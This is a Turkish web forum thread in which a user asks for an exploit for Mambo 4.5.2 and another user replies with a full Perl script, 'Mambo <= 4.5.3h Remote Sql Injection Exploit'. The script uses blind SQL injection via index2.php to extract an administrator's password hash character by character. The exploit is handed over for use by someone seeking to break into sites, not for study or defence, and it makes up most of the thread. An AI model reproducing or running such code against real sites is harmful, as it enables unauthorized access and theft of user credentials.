MAMBO Yardım !!

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    CarteL24
    CarteL24's avatar
    Kayıt Tarihi: 16/Haziran/2006
    Erkek
    Arkadaşlar formda arattım ama bulamadım ... Mambo v.4.5.2 açıklarını bilen varsa söölerse sevinirim...
    saygılar..

    -=[ Barış İstiyorsan Savaşa Hazır Ol !! ]=-
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    prokto
    prokto's avatar
    Kayıt Tarihi: 03/Ocak/2006
    Erkek
    reklam yapmış gibi olmak istemiyorum ama CarteL24 kardeşim Mambo hakkında detaylı açıklamayı www.mjturkiye.net adresinde bulabilirsin.Zaten bu sitenin kurulma amacı Mambo ve Joomla sitelerini tanıtmak.



    Bu imza çok eskidi artık...
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    wasd
    wasd's avatar
    Kayıt Tarihi: 14/Haziran/2006
    Erkek
    Ewet mjde bayaa bilgi var mamboyla ilgili;ama üyelik istiyo :D ben üyeyim,başka türlü inceleyemiyon forumu :D

    :)
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    CarteL24
    CarteL24's avatar
    Kayıt Tarihi: 16/Haziran/2006
    Erkek
    arkadaşlar ilginize teşekkürler ama orda bi halt yok :))

    exploid açığı varmış die duymuştum ?
    açıksaçsı bana v.4.5.2 açığı lazım... ajaba olan var mı?

    -=[ Barış İstiyorsan Savaşa Hazır Ol !! ]=-
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Lizozom
    Lizozom's avatar
    Kayıt Tarihi: 14/Haziran/2006
    Erkek
    Mambo <= 4.5.3h Remote Sql Injection
    ----------------------------------------------------------------------------
    #!/usr/bin/perl -w

    use LWP::UserAgent;

    print q{
    Mambo <= 4.5.3h Remote Sql Injection Exploit (gpc = off)
    Exploit written by KingOfSka @ contropotere.netsons.org
    discovered by James Bercegay of the GulfTech Security Research Team

    };

    $ua = new LWP::UserAgent;
    $ua->agent("ControPotereExploiter" . $ua->agent);

    if (!$ARGV[1]) {$ARGV[1] = 'admin';}



    my $user = $ARGV[1];

    if (!$ARGV[0])
    {
    print "Usage: mambo.pl http://www.site.com/mambo [nickname] \n\n";
    exit;
    }


    my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e" ,"f");

    my $outputs = '';

    for( $i=1; $i < 33; $i++ )
    {
    for( $j=0; $j < 16; $j++ )
    {
    my $current = $charset[$j];
    my $path = $ARGV[0] . "/index2.php?option=com_content&task=-99'%20UNION%20SELECT%2 0password%20FROM%20mos_users%20WHERE%20username='$user'%20AN D%20MID(password,$i,1)='$current'/*";
    my $res = $ua->get($path);


    $pattern = 'You are not authorized to view this resource';

    $_ = $res->content;



    if ( (/$pattern/) )
    {
    $outputs .= $current;
    print "$i/32 found\n";
    last;
    }

    }
    if ( length($outputs) < 1 ) { print "Not Exploitable!\n"; exit; }
    }
    print "Password Hash is : $outputs \n";
    exit;

    -----------------------------------------------------------------------------

    Umarım işine yarar dostum..
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ghost_67
    ghost_67's avatar
    Kayıt Tarihi: 14/Haziran/2006
    Erkek
    joomla mambo nun hacklenmiş yeni sürümüdür.mjtr de de artık mambo yla fazla ilgilenmiyorlar.
    hem joomla'nın yeni sürümü çıktı ve yannılmıosam toplam 23 güvenlik açığı kapatıldı.
    ben joomla öneririm;)

    TÜRKLER Size Dokunmadıkça Siz TÜRKLERE Dokunmayın!!! Hz.Muhammed(s.a.v)
Toplam Hit: 1142 Toplam Mesaj: 6